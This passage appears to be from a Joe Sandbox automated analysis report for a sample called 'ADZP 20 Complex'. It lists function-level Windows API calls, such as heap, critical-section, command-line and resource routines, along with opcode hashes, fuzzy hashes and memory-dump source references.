                    Similarity
                    • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                    • String ID:
                    • API String ID: 85618057-0
                    • Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                    • Instruction ID: 2660d4446155f5fb089545407d2c8513ff3ad75f9eb032afb91e50ebd33cab77
                    • Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                    • Instruction Fuzzy Hash: 05F0E233404610FBC6205B619C49EE77779EF55767724883FF94172291CB386841CE6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                    • DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                    • CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CurrentHandleProcess$CloseDuplicate
                    • String ID:
                    • API String ID: 1410216518-0
                    • Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                    • Instruction ID: ce6dac3176af70590056e0be6dcfbc27d6d18e8bdc9d520293d6dd9450c8e6f1
                    • Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                    • Instruction Fuzzy Hash: 73E0ED75608209BFEB10DF91DC49F9ABB7DEB44741F104065F905D2660EB71AD11CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                      • Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
                      • Part of subcall function 00402E49: __fprintf_l.LIBCMT ref: 00402ECB
                      • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                      • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                      • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                      • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                      • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                      • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                      • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                      • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                      • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                      • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                      • Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67
                    • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                    • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,020A8F10,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD
                      • Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                    • String ID: $pA
                    • API String ID: 790731606-4007739358
                    • Opcode ID: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                    • Instruction ID: e60bee266b2990c05e42038f4eaf1cd2a2725b994cf9f5ea8c77fc408b4d2e90
                    • Opcode Fuzzy Hash: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                    • Instruction Fuzzy Hash: 6851E6B9601204BEE500BBB39D82D7F266DDBC471CB108C3FB440A50D3E93CAE65662E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
                    • PathRemoveArgsW.SHLWAPI(?), ref: 00402585
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNEL32(020A9F70,020A9F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                      • Part of subcall function 0040E5F0: RtlFreeHeap.NTDLL(020A0000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                    • String ID: *pA
                    • API String ID: 1199808876-3833533140
                    • Opcode ID: dffdd5ba53270b8295326c032e0582dd1a13c4ab5ce676133e23ebaef934a0d5
                    • Instruction ID: beb9823a99ae011e4ed5f1d055ef6d1d692690281f772a57edd19b399da9bd76
                    • Opcode Fuzzy Hash: dffdd5ba53270b8295326c032e0582dd1a13c4ab5ce676133e23ebaef934a0d5
                    • Instruction Fuzzy Hash: E541E9B5504301BED600BBB39D8293F76A8EBC471CF508C3FB444A61D2EA3CD9655A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040D968: TlsGetValue.KERNEL32(?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D96F
                      • Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A
                      • Part of subcall function 0040D968: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D999
                    • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$AllocCommandHeapLine
                    • String ID: $"
                    • API String ID: 1339485270-3817095088
                    • Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                    • Instruction ID: 229198f1d41a65a6e9ffff917a794aecd7294c87f6384db1244c7b0cd665179e
                    • Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                    • Instruction Fuzzy Hash: 3131A6735252218ADB64AF10981127772A1EFA2B60F18C17FE4926B3C2F37D4D41D369
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: _wcsicmpwcscmp
                    • String ID: $0A
                    • API String ID: 3419221977-513306843
                    • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                    • Instruction ID: a9c09230f7291aa91694be4cadd9aa4df44d847ede942287367b49c05577748a
                    • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                    • Instruction Fuzzy Hash: 39118F76508B018BD3209F56D440913B3F9EF94364329893FD88963790DB76EC658BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID: $0A
                    • API String ID: 626452242-513306843
                    • Opcode ID: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                    • Instruction ID: 6633c5b8762e659e7e7445bcc2ebba2587ddb8769fcb30c67f307584ac15d0df
                    • Opcode Fuzzy Hash: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                    • Instruction Fuzzy Hash: D4F0653A38632137E230215A6C06F57295DC785F71F3542367B247F3D0C5B1680046BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?), ref: 0040DC13
                    • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?), ref: 0040DCC8
                    • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000), ref: 0040DCEB
                    • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?), ref: 0040DD43
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 830345296-0
                    • Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                    • Instruction ID: 326a62a2d88e17b700e0b5dbbe6d23d3e5727d380a42910b8190cd6cec96877c
                    • Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                    • Instruction Fuzzy Hash: D151E570A04B069FD324CF69D980962B7F4FF587103148A3EE49A97A50D338F959CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcslen.MSVCRT ref: 0040E7E5
                    • HeapAlloc.KERNEL32(020A0000,00000000,0000000A), ref: 0040E809
                    • HeapReAlloc.KERNEL32(020A0000,00000000,00000000,0000000A), ref: 0040E82D
                    • HeapFree.KERNEL32(020A0000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E864
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Alloc$Freewcslen
                    • String ID:
                    • API String ID: 2479713791-0
                    • Opcode ID: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                    • Instruction ID: 61d70e0538fde6a9b2f408d2d23f17b2afdd03d3414029a6c312abdd158bf447
                    • Opcode Fuzzy Hash: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                    • Instruction Fuzzy Hash: 6C2115B5604209EFCB04DF95D884FAAB7B9EB49354F10C169F8099B390D735EA81CB98
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                    • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB63
                    • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                      • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 830345296-0
                    • Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                    • Instruction ID: 234cd8b738bfcb23ec7c58dff1098e76d365aadfe99366d65fb7203dd4a6e8aa
                    • Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                    • Instruction Fuzzy Hash: 6A113D72504710AFC3208F68DC40D56BBFAEB48721B15892EE596E36A0CB34F844CB65
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                    • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DD6F
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DD86
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DDA2
                    • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DDBF
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalFreeHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 1298188129-0
                    • Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                    • Instruction ID: 339acd6113cd15283fdaf2d24efa5c6700350868ea18a16039eb98c455fe0077
                    • Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                    • Instruction Fuzzy Hash: 7C012C71A0161ABFC7108F96ED049A7FB78FF49751345817AA804A7664D734E824CFE8
                    Uniqueness
                    • Uniqueness Score: -1.00%
                    APIs
                      • Part of subcall function 0040A79A: memset.MSVCRT ref: 0040A802
                      • Part of subcall function 0040DFC6: EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                      • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                      • Part of subcall function 0040DFC6: LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                    • HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                    • HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                    • HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeHeap$CriticalSection$EnterLeavememset
                    • String ID:
                    • API String ID: 4254243056-0
                    • Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                    • Instruction ID: 62ba4ec21453903b754b53d00370c9fddb20f7a3713721c865cfde946388869e
                    • Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                    • Instruction Fuzzy Hash: B5F04471105209BFC6125B16DD40C57BF7DFF49798342412AB40463570CB36ED75DBA8
                    Uniqueness
                    • Uniqueness Score: -1.00%